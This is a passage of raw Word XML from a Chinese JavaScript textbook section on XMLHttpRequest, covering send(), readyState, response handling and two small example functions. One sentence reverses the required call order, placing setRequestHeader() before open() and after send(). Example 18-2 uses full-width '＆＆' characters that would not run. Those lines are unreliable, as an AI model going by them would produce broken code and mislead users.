        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>发起</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求的最后一步是指定可选的请求主体并向服务器发送它。使用</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>方法像如下这样做：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.send(null);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求绝对没有主体，所以应该传递</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>或省略这个参数。</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求通常拥有主体，同时它应该匹配使用</w:t>
      </w:r>
      <w:r>
        <w:t>setRequestHeader()</w:t>
      </w:r>
      <w:r>
        <w:t>指定的</w:t>
      </w:r>
      <w:r>
        <w:t>"Content-Type"</w:t>
      </w:r>
      <w:r>
        <w:t>头。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>顺序问题</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求的各部分有指定顺序：请求方法和</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>首先到达，然后是请求头，最后是请求主体。</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>实现通常直到调用</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>方法才开始启动网络。但</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest API</w:t>
      </w:r>
      <w:r>
        <w:t>的设计似乎使每个方法都将写入网络流。这意味着调用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>方法的顺序必须匹配</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求的架构。例如，</w:t>
      </w:r>
      <w:r>
        <w:t>setRequestHeader()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的调用必须在调用</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>之前但在调用</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>之后，否则它将抛出异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>18-1</w:t>
      </w:r>
      <w:r>
        <w:t>使用了我们目前介绍的所有</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>方法。它用</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>方法发送文本字符串给服务器，并忽略服务器返回的任何响应。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>18-1</w:t>
      </w:r>
      <w:r>
        <w:t>：用</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>方法发送纯文本给服务器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function postMessage(msg){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var request=new XMLHttpRequest();//</w:t>
      </w:r>
      <w:r>
        <w:t>新请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.open("POST","/log.php");//</w:t>
      </w:r>
      <w:r>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:t>POS</w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t>向服务器端发送脚本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>用请求主体发送纯文本消息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.setRequestHeader("Content-Type",//</w:t>
      </w:r>
      <w:r>
        <w:t>请求主体将是纯文本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"text/plain;charset=UTF-8");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.send(msg);//</w:t>
      </w:r>
      <w:r>
        <w:t>把</w:t>
      </w:r>
      <w:r>
        <w:t>msg</w:t>
      </w:r>
      <w:r>
        <w:t>作为请求主体发送</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>请求完成，我们将忽略任何响应和任何错误</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注意例</w:t>
      </w:r>
      <w:r>
        <w:t>18-1</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>方法启动请求，然后返回，当它等待服务器的响应时并不阻塞。接下来章节介绍的几乎都是异步处理</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>响应。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="453" w:name="18_1_2_Qu_De_Xiang_Ying_"/>
      <w:r>
        <w:t>18.1.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　取得响应</w:t>
      </w:r>
      <w:bookmarkEnd w:id="453"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个完整的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>响应由</w:t>
      </w:r>
      <w:r>
        <w:t>状态码、响应头集合和响应主体组成。这些都可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象的属性和方法使用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·status</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>statusText</w:t>
      </w:r>
      <w:r>
        <w:t>属性以数字和文本的形式返回</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>状态码。这些属性保存标准的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>值，像</w:t>
      </w:r>
      <w:r>
        <w:t>200</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"OK"</w:t>
      </w:r>
      <w:r>
        <w:t>表示成功请求，</w:t>
      </w:r>
      <w:r>
        <w:t>404</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"Not Found"</w:t>
      </w:r>
      <w:r>
        <w:t>表示</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>不能匹配服务器上的任何资源。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>getResponseHeader()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>getAllResponseHeaders()</w:t>
      </w:r>
      <w:r>
        <w:t>能查询响应头。</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>会自动处理</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>：它会从</w:t>
      </w:r>
      <w:r>
        <w:t>getAllResponseHeade</w:t>
      </w:r>
      <w:r>
        <w:t>rs()</w:t>
      </w:r>
      <w:r>
        <w:t>头返回集合中过滤掉</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>头，而如果给</w:t>
      </w:r>
      <w:r>
        <w:t>getResponseHeader()</w:t>
      </w:r>
      <w:r>
        <w:t>传递</w:t>
      </w:r>
      <w:r>
        <w:t>"Set-Cookie"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"Set-Cookie2"</w:t>
      </w:r>
      <w:r>
        <w:t>则返回</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>响应主体可以从</w:t>
      </w:r>
      <w:r>
        <w:t>responseText</w:t>
      </w:r>
      <w:r>
        <w:t>属性中得到文本形式的，从</w:t>
      </w:r>
      <w:r>
        <w:t>responseXML</w:t>
      </w:r>
      <w:r>
        <w:t>属性中得到</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>形式的。（这个属性名是有历史的：它实际上对</w:t>
      </w:r>
      <w:r>
        <w:t>XHTML</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档有效，但</w:t>
      </w:r>
      <w:r>
        <w:t>XHR2</w:t>
      </w:r>
      <w:r>
        <w:t>说它也应该对普通的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>文档工作。）关于</w:t>
      </w:r>
      <w:r>
        <w:t>responseXML</w:t>
      </w:r>
      <w:r>
        <w:t>的更多内容请看</w:t>
      </w:r>
      <w:r>
        <w:t>18.1.2</w:t>
      </w:r>
      <w:r>
        <w:t>节下面的</w:t>
      </w:r>
      <w:r>
        <w:t>“2.</w:t>
      </w:r>
      <w:r>
        <w:t>响应解码</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象通常（</w:t>
      </w:r>
      <w:r>
        <w:t>除了见</w:t>
      </w:r>
      <w:r>
        <w:t>18.1.2</w:t>
      </w:r>
      <w:r>
        <w:t>节下面的</w:t>
      </w:r>
      <w:r>
        <w:t>“1.</w:t>
      </w:r>
      <w:r>
        <w:t>同步响应</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>节的内容）异步使用：发送请求后，</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>方法立即返回，直到响应返回，前面列出的响应方法和属性才有效。为了在响应准备就绪时得到通知，必须监听</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象上的</w:t>
      </w:r>
      <w:r>
        <w:t>readystatechange</w:t>
      </w:r>
      <w:r>
        <w:t>事件（或者</w:t>
      </w:r>
      <w:r>
        <w:t>18.1.4</w:t>
      </w:r>
      <w:r>
        <w:t>节描述新的</w:t>
      </w:r>
      <w:r>
        <w:t>XHR</w:t>
      </w:r>
      <w:r>
        <w:t>进度事件）。但为了理解这个事件类型，你必须理解</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>是一个整数，它指定了</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求的状态，同时表</w:t>
      </w:r>
      <w:r>
        <w:t>18-1</w:t>
      </w:r>
      <w:r>
        <w:t>列出了它可能的值。第一列的符号是</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数定义的</w:t>
      </w:r>
      <w:r>
        <w:t>常量。这些常量是</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>规范的一部分，但老的浏览器和</w:t>
      </w:r>
      <w:r>
        <w:t>IE 8</w:t>
      </w:r>
      <w:r>
        <w:t>没有定义它们，通常看到使用硬编码值</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>来表示</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest.DONE</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251701248" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="3234905" cy="1431984"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="42" name="00042.jpeg" descr="00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00042.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3234905" cy="1431984"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>理论上，每次</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>属性改变都会触发</w:t>
      </w:r>
      <w:r>
        <w:t>readystatechange</w:t>
      </w:r>
      <w:r>
        <w:t>事件。实际中，当</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>改变为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>时可能没有触发这个事件。当调用</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>时，即使</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>仍处于</w:t>
      </w:r>
      <w:r>
        <w:t>OPENED</w:t>
      </w:r>
      <w:r>
        <w:t>状态，也通常触发它。某些浏览器在</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>LOADING</w:t>
      </w:r>
      <w:r>
        <w:t>状态时能触发多次事件来给出进度反馈。当</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>值改变为</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>或服务器的响应完成时，所有的浏览器都触发</w:t>
      </w:r>
      <w:r>
        <w:t>readystatechange</w:t>
      </w:r>
      <w:r>
        <w:t>事件。因为在响应完成之前也会触发事件，所以事件处理程序应该一直检验</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为了监听</w:t>
      </w:r>
      <w:r>
        <w:t>ready</w:t>
      </w:r>
      <w:r>
        <w:t>statechange</w:t>
      </w:r>
      <w:r>
        <w:t>事件，请把事件处理函数设置为</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>onreadystatechange</w:t>
      </w:r>
      <w:r>
        <w:t>属性。也能使用</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>（或在</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>以及之前版本中使用</w:t>
      </w:r>
      <w:r>
        <w:t>attachEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>），但通常每个请求只需要一个处理程序，所以只设置</w:t>
      </w:r>
      <w:r>
        <w:t>onreadystatechange</w:t>
      </w:r>
      <w:r>
        <w:t>更容易。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>18-2</w:t>
      </w:r>
      <w:r>
        <w:t>定义了</w:t>
      </w:r>
      <w:r>
        <w:t>getText()</w:t>
      </w:r>
      <w:r>
        <w:t>函数来演示如何监听</w:t>
      </w:r>
      <w:r>
        <w:t>readystatechange</w:t>
      </w:r>
      <w:r>
        <w:t>事件。事件处理程序首先要确保请求完成。如果这样，它会检查响应状态码来取保请求成功。然后它查找</w:t>
      </w:r>
      <w:r>
        <w:t>"Content</w:t>
      </w:r>
      <w:r>
        <w:t>-Type"</w:t>
      </w:r>
      <w:r>
        <w:t>头来验证响应主体是否是期望的类型。如果</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>个条件都得到满足，它会把响应主体（以文本形式）发送给指定的回调函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>18-2</w:t>
      </w:r>
      <w:r>
        <w:t>：获取</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>响应的</w:t>
      </w:r>
      <w:r>
        <w:t>onreadystatechange</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>发出一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求以获得指定</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>当响应成功到达，验证它是否是纯文本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果是，把它传递给指定回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function getText(url,callback){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var request=new XMLHttpRequest();//</w:t>
      </w:r>
      <w:r>
        <w:t>创建新请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.open("GET",ur</w:t>
      </w:r>
      <w:r>
        <w:t>l);//</w:t>
      </w:r>
      <w:r>
        <w:t>指定待获取的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>request.onreadystatechange=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>定义事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果请求完成，则它是成功的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(request.readyState===4</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>request.status===200){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var type=request.getResponseHeader("Content-Type");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(type.match(/^text/))//</w:t>
      </w:r>
      <w:r>
        <w:t>确保响应是文本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>callback(request.responseText);//</w:t>
      </w:r>
      <w:r>
        <w:t>把它传递给回调函</w:t>
      </w:r>
      <w:r>
        <w:t>数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.send(null);//</w:t>
      </w:r>
      <w:r>
        <w:t>立即发送请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t>同步响应</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由于其本身的性质，异步处理</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>响应是最好的方式。然而，</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>也支持同步响应。如果把</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>作为第</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>个参数传递给</w:t>
      </w:r>
      <w:r>
